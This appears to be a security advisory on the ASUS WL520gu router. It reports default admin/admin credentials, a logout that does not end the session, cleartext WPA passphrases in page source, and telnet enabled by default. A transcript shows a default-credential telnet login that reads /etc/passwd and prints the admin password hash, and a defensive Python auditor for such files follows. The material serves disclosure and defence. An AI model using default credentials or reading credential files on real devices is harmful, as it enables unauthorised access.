ASUS WL520gu Wireless Router Multiple Vulnerabilities

The ASUS WL520gu Wireless Router (Shodan search) ships with a default account of admin/admin. The web interface uses HTTP Basic authentication, so its “logout” function does not actually terminate the web application session: the browser keeps the cached credentials and resends them with every request, so anyone using a browser that previously authenticated to the router keeps administrative access until that browser is closed.

Two pages also return the wireless passphrase in cleartext in the page source and merely mask it with client-side JavaScript:

http://localhost/Basic_GOperation_Content.asp
WPA-PSK passphrase returned in clear (CVE-2013-78002):
[screenshot: wl520-passphrase]

http://localhost/Advanced_Wireless_Content.asp
WPA Pre-Shared Key returned in clear (CVE-2013-78003):
[screenshot: wl520-wpa_preshared]

Telnet is also enabled by default, so the same default credentials give a remote shell. The session below shows that the admin account runs as uid 0 and that its MD5-crypt ($1$) password hash, here with an empty salt, sits in a world-readable /etc/passwd rather than a shadow file, so anyone who logs in can copy it for offline cracking:

df:/home/df # telnet 1.2.3.4
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
WL-0022159F09A9 login: admin
Password:
[admin@WL-0022159F09A9 root]$ cd /etc
[admin@WL-0022159F09A9 etc]$ cat passwd
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/usr/local/root:/bin/sh
nobody:x:99:99:nobody:/:/sbin/nologin
[admin@WL-0022159F09A9 etc]$
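As an added example (not part of the original post), the following Python audits a passwd dump like the one above for the weaknesses it exposes: a hash kept in world-readable /etc/passwd instead of a shadow file, MD5-crypt (the $1$ prefix) as the scheme, an empty salt (nothing between $1$ and the next $), and a non-root account name running as uid 0. The sample input is the two lines copied from the telnet session; the function and finding names are this example's own and not part of any ASUS tooling.

```python
"""Audit passwd(5) entries for the weaknesses visible in the WL520gu transcript:
a hash kept in world-readable passwd instead of shadow, a weak crypt(3) scheme,
an empty salt, and a non-root account name running as uid 0."""
from dataclasses import dataclass

# Constructed sample input: the two lines the router printed in the telnet session above.
SAMPLE_PASSWD = """\
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/usr/local/root:/bin/sh
nobody:x:99:99:nobody:/:/sbin/nologin
"""

# crypt(3) "$id$" prefixes we recognise; the router uses $1$ (MD5-crypt).
HASH_SCHEMES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt"}
WEAK_SCHEMES = {"md5crypt", "descrypt"}


@dataclass
class PasswdEntry:
    user: str
    field: str   # second field: a crypt(3) hash, or a placeholder such as "x" or "*"
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse passwd(5) text; every line must carry exactly seven colon-separated fields."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        user, field, uid, gid, _gecos, home, shell = parts
        entries.append(PasswdEntry(user, field, int(uid), int(gid), home, shell))
    return entries


def hash_scheme(field: str):
    """Return (scheme, salt) for a crypt(3) string, or None when the field is only
    a placeholder (the real hash lives in /etc/shadow, or the account is locked)."""
    if field in ("x", "*", "!", "!!", ""):
        return None
    for prefix, name in HASH_SCHEMES.items():
        if field.startswith(prefix):
            segments = field[len(prefix):].split("$")
            # sha256crypt/sha512crypt may carry an optional "rounds=N" segment before the salt
            if segments and segments[0].startswith("rounds="):
                segments = segments[1:]
            return name, segments[0] if segments else ""
    # No recognised "$id$" prefix: treat as traditional 13-character DES crypt (2-char salt)
    return "descrypt", field[:2]


def audit(entries):
    """Return human-readable findings, one per weakness, in a stable order."""
    findings = []
    for e in entries:
        if e.field == "":
            findings.append(f"{e.user}: empty password field (login without a password)")
        scheme = hash_scheme(e.field)
        if scheme is not None:
            name, salt = scheme
            findings.append(f"{e.user}: password hash stored in world-readable passwd, not shadow")
            if name in WEAK_SCHEMES:
                findings.append(f"{e.user}: weak hash scheme {name}")
            if salt == "":
                findings.append(f"{e.user}: empty salt")
        if e.uid == 0 and e.user != "root":
            findings.append(f"{e.user}: non-root account name with uid 0")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_passwd(SAMPLE_PASSWD)):
        print(finding)
```

Run against the transcript, the admin line produces four findings and the nobody line none. The empty salt matters beyond crackability: with no salt, every unit that still has the default password carries the identical hash, so a single known value identifies an unchanged default across the whole fleet of devices.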
